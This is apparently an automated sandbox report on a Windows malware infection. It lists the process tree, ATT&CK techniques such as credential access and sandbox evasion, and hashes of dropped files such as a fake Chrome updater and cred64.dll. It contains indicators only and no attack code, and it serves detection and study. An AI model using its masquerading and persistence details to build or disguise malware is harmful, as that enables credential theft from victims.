C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 600
3⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2900 -ip 2900
1⤵
PID:3772

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3936

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4216 -ip 4216
1⤵
PID:3636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4216 -ip 4216
1⤵
PID:4248

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 528 -p 3784 -ip 3784
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 520 -ip 520
1⤵
PID:1048

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2148

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:2396

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:4464

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\ProgramData\mozglue.dll
Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\nss3.dll
Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8808750cf94934c2a6471ccc5f0b932a

SHA1
dd1f5c5a7b725ecb0e4e96e0cebb62721e774dab

SHA256
ffe821af02d97eeb40bca0f73c858296c854263a5477941c3bc4eb649289d69c

SHA512
30b7e3f958621a284e95f2503daa1f5a0a10e01f18ed4e2ce9ebbba356a9d2a5bc4f15d3284863d405c24b9aa9181ec8cdf9def74a223a741aeb51d8190caa29

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
Filesize
3.5MB

MD5
17d8b23d0a991861f9a34ca2853bd267

SHA1
54325fa47d6423bef266ff925fdc22b65ae883cb

SHA256
23b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1

SHA512
1c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
Filesize
3.5MB

MD5
17d8b23d0a991861f9a34ca2853bd267

SHA1
54325fa47d6423bef266ff925fdc22b65ae883cb

SHA256
23b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1

SHA512
1c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
Filesize
169KB

MD5
0f5f8000ce6bbb68cc262b166286bde6

SHA1
1ef1e20162fd5619f04e858937366577db7080f9

SHA256
2d06d337b3b0a536a5e7b0249c6752539301e3e0d223ecd9d0a7b6c17e9f558e

SHA512
65f5d4546bfda6bba241138b5ac3621b35e654b0eae1a86acb693bb7203f288ad71e264547bcf402e03288ab84b07fa73c9963c9af2bab4589b32f71f26d5c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
Filesize
169KB

MD5
0f5f8000ce6bbb68cc262b166286bde6

SHA1
1ef1e20162fd5619f04e858937366577db7080f9

SHA256
2d06d337b3b0a536a5e7b0249c6752539301e3e0d223ecd9d0a7b6c17e9f558e

SHA512
65f5d4546bfda6bba241138b5ac3621b35e654b0eae1a86acb693bb7203f288ad71e264547bcf402e03288ab84b07fa73c9963c9af2bab4589b32f71f26d5c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe
Filesize
1.2MB

MD5
7f07ad611a288398f431548586a125df

SHA1
085493bd1897d914976836e14e2a0d79e380c885

SHA256
e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43

SHA512
ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe
Filesize
1.2MB

MD5
7f07ad611a288398f431548586a125df

SHA1
085493bd1897d914976836e14e2a0d79e380c885

SHA256
e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43

SHA512
ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe
Filesize
1.2MB

MD5
7f07ad611a288398f431548586a125df

SHA1
085493bd1897d914976836e14e2a0d79e380c885

SHA256
e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43

SHA512
ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe
Filesize
1.2MB

MD5
7f07ad611a288398f431548586a125df

SHA1
085493bd1897d914976836e14e2a0d79e380c885

SHA256
e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43

SHA512
ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\36A0.exe
Filesize
3.1MB

MD5
c79db0e3f2b11791dfe7447b67bf4285

SHA1
8c5129780023e578097bd3a096cc3bef6e3c5586

SHA256
bf4b3786b07e3ac17c257a56e260f464aa5269c9af640a92b4418f432da92394

SHA512
c9f58660c8b9a7cc702cab69a3aff04d872d0c9d62c17146bc287d081ed44b4b457c90f42a4af56608378638f64be14eebb39b93b07ecc4332b6b6057b8955f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\36A0.exe
Filesize
3.1MB

MD5
c79db0e3f2b11791dfe7447b67bf4285

SHA1
8c5129780023e578097bd3a096cc3bef6e3c5586

SHA256
bf4b3786b07e3ac17c257a56e260f464aa5269c9af640a92b4418f432da92394

SHA512
c9f58660c8b9a7cc702cab69a3aff04d872d0c9d62c17146bc287d081ed44b4b457c90f42a4af56608378638f64be14eebb39b93b07ecc4332b6b6057b8955f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll
Filesize
4.2MB

MD5
07c6e37765ea4f794d640e91899addd0

SHA1
542bf20d57bdb66cb106919834cfd7965481cb3c

SHA256
e28c48bda266300112fcf2d02a30620c441a25c5687f2c93f6010c6ac9de5c9f

SHA512
b490c7054bab07a44d75d05a50107d8890ce2cef0b1501c0965e4cf928c0761b121e41b1ad986dc1483a8d84ead45811e386d3f77005b954424467cfc75bb7ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll
Filesize
4.2MB

MD5
07c6e37765ea4f794d640e91899addd0

SHA1
542bf20d57bdb66cb106919834cfd7965481cb3c

SHA256
e28c48bda266300112fcf2d02a30620c441a25c5687f2c93f6010c6ac9de5c9f

SHA512
b490c7054bab07a44d75d05a50107d8890ce2cef0b1501c0965e4cf928c0761b121e41b1ad986dc1483a8d84ead45811e386d3f77005b954424467cfc75bb7ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Player3.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Player3.exe
Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\birge.exe
Filesize
4.1MB

MD5
c5258a190ce2684850af553aff00bcf1

SHA1
6d1af578d44a08f3c0d986639ba02e5a681b1018

SHA256
d5ad882f073204e5a841f0478fbf27ee1ad4ae2bbf09853fedf85cea9c35bb98

SHA512
e815aa48ba7854cc494c48093d1677472446b2eee6b12fa0989be43587e3f9522520bb5b695af02f3603036fda59060ff3c15b39f1fff3028c06256353ee98f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\birge.exe
Filesize
4.1MB

MD5
c5258a190ce2684850af553aff00bcf1

SHA1
6d1af578d44a08f3c0d986639ba02e5a681b1018

SHA256
d5ad882f073204e5a841f0478fbf27ee1ad4ae2bbf09853fedf85cea9c35bb98

SHA512
e815aa48ba7854cc494c48093d1677472446b2eee6b12fa0989be43587e3f9522520bb5b695af02f3603036fda59060ff3c15b39f1fff3028c06256353ee98f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
30d5f615722d12fdda4f378048221909

SHA1
e94e3e3a6fae8b29f0f80128761ad1b69304a7eb

SHA256
b7cb464cd0c61026ec38d89c0a041393bc9369e217303677551eec65a09d2628

SHA512
a561a224d7228ec531a966c7dbd6bc88138e2f4a1c8112e5950644f69bf3a43b1e87e03bc1b4fd5e9ca071b5a9353b18697573404602ccd51f2946faf95144c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
30d5f615722d12fdda4f378048221909

SHA1
e94e3e3a6fae8b29f0f80128761ad1b69304a7eb

SHA256
b7cb464cd0c61026ec38d89c0a041393bc9369e217303677551eec65a09d2628

SHA512
a561a224d7228ec531a966c7dbd6bc88138e2f4a1c8112e5950644f69bf3a43b1e87e03bc1b4fd5e9ca071b5a9353b18697573404602ccd51f2946faf95144c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
0b35335b70b96d31633d0caa207d71f9

SHA1
996c7804fe4d85025e2bd7ea8aa5e33c71518f84

SHA256
ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

SHA512
ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
0b35335b70b96d31633d0caa207d71f9

SHA1
996c7804fe4d85025e2bd7ea8aa5e33c71518f84

SHA256
ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

SHA512
ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
0b35335b70b96d31633d0caa207d71f9

SHA1
996c7804fe4d85025e2bd7ea8aa5e33c71518f84

SHA256
ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

SHA512
ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
0b35335b70b96d31633d0caa207d71f9

SHA1
996c7804fe4d85025e2bd7ea8aa5e33c71518f84

SHA256
ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

SHA512
ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\pb1111.exe
Filesize
3.5MB

MD5
12af31a83714f11103e061ac722195e0

SHA1
a0b08575934a67b38a6e12900776b4c91a4fc022

SHA256
ac371bda90a40da22f6fcf633b7ad731c9b11de21cc91ed47ab12cbe18d18ae5

SHA512
6fba6d1763520d37a6108be7253a43b3afad8133e23935fffdb98c8a1ab11d13a411a81dd3eddadefd816a452600aca85bb37c53577fcc784a777f82bb7ce218

Download Submit
C:\Users\Admin\AppData\Local\Temp\pb1111.exe
Filesize
3.5MB

MD5
12af31a83714f11103e061ac722195e0

SHA1
a0b08575934a67b38a6e12900776b4c91a4fc022

SHA256
ac371bda90a40da22f6fcf633b7ad731c9b11de21cc91ed47ab12cbe18d18ae5

SHA512
6fba6d1763520d37a6108be7253a43b3afad8133e23935fffdb98c8a1ab11d13a411a81dd3eddadefd816a452600aca85bb37c53577fcc784a777f82bb7ce218

Download Submit
C:\Users\Admin\AppData\Local\Temp\slwang.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Local\Temp\slwang.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Local\Temp\slwang.exe
Filesize
160KB

MD5
b9363486500e209c05f97330226bbf8a

SHA1
bfe2d0072d09b30ec66dee072dde4e7af26e4633

SHA256
01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35

SHA512
6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

Download Submit
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll
Filesize
1.0MB

MD5
2c4e958144bd089aa93a564721ed28bb

SHA1
38ef85f66b7fdc293661e91ba69f31598c5b5919

SHA256
b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855

SHA512
a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6

Download Submit
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll
Filesize
1.0MB

MD5
2c4e958144bd089aa93a564721ed28bb

SHA1
38ef85f66b7fdc293661e91ba69f31598c5b5919

SHA256
b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855

SHA512
a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6

Download Submit
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll
Filesize
1.0MB

MD5
2c4e958144bd089aa93a564721ed28bb

SHA1
38ef85f66b7fdc293661e91ba69f31598c5b5919

SHA256
b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855

SHA512
a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/64-203-0x0000000000000000-mapping.dmp

Download
memory/204-152-0x0000000000000000-mapping.dmp

Download
memory/324-274-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp

Filesize
10.8MB

Download
memory/324-269-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp

Filesize
10.8MB

Download
memory/520-245-0x0000000000400000-0x0000000002E81000-memory.dmp

Filesize
42.5MB

Download
memory/520-243-0x0000000004BD9000-0x0000000004ED9000-memory.dmp

Filesize
3.0MB

Download
memory/520-244-0x0000000004EE0000-0x000000000529C000-memory.dmp

Filesize
3.7MB

Download
memory/520-270-0x0000000000400000-0x0000000002E81000-memory.dmp

Filesize
42.5MB

Download
memory/520-233-0x0000000000000000-mapping.dmp

Download
memory/592-133-0x0000000000000000-mapping.dmp

Download
memory/600-258-0x0000000000000000-mapping.dmp

Download
memory/756-307-0x0000000000000000-mapping.dmp

Download
memory/780-261-0x0000000000000000-mapping.dmp

Download
memory/932-145-0x0000000140000000-0x0000000140618000-memory.dmp

Filesize
6.1MB

Download
memory/932-136-0x0000000000000000-mapping.dmp

Download
memory/960-236-0x0000000000000000-mapping.dmp

Download
memory/1020-162-0x0000000000000000-mapping.dmp

Download
memory/1260-139-0x0000000000000000-mapping.dmp

Download
memory/1388-255-0x0000000000000000-mapping.dmp

Download
memory/1396-318-0x0000000000000000-mapping.dmp

Download
memory/1412-141-0x0000000000000000-mapping.dmp

Download
memory/1780-253-0x0000000000000000-mapping.dmp

Download
memory/1876-154-0x0000000000000000-mapping.dmp

Download
memory/2076-251-0x0000000000000000-mapping.dmp

Download
memory/2144-308-0x0000000000000000-mapping.dmp

Download
memory/2208-231-0x0000000000000000-mapping.dmp

Download
memory/2296-165-0x0000000000000000-mapping.dmp

Download
memory/2320-315-0x0000000000000000-mapping.dmp

Download
memory/2384-277-0x0000000003730000-0x0000000004281000-memory.dmp

Filesize
11.3MB

Download
memory/2384-282-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2384-290-0x0000000003730000-0x0000000004281000-memory.dmp

Filesize
11.3MB

Download
memory/2384-276-0x0000000003730000-0x0000000004281000-memory.dmp

Filesize
11.3MB

Download
memory/2384-275-0x0000000003730000-0x0000000004281000-memory.dmp

Filesize
11.3MB

Download
memory/2384-279-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2384-280-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2384-285-0x0000000004409000-0x000000000440B000-memory.dmp

Filesize
8KB

Download
memory/2384-281-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2384-278-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2384-259-0x0000000000000000-mapping.dmp

Download
memory/2384-283-0x0000000004390000-0x00000000044D0000-memory.dmp

Filesize
1.2MB

Download
memory/2660-254-0x0000000000000000-mapping.dmp

Download
memory/2660-313-0x0000000000000000-mapping.dmp

Download
memory/2736-324-0x0000000000000000-mapping.dmp

Download
memory/2740-164-0x0000000000000000-mapping.dmp

Download
memory/2836-304-0x0000000000000000-mapping.dmp

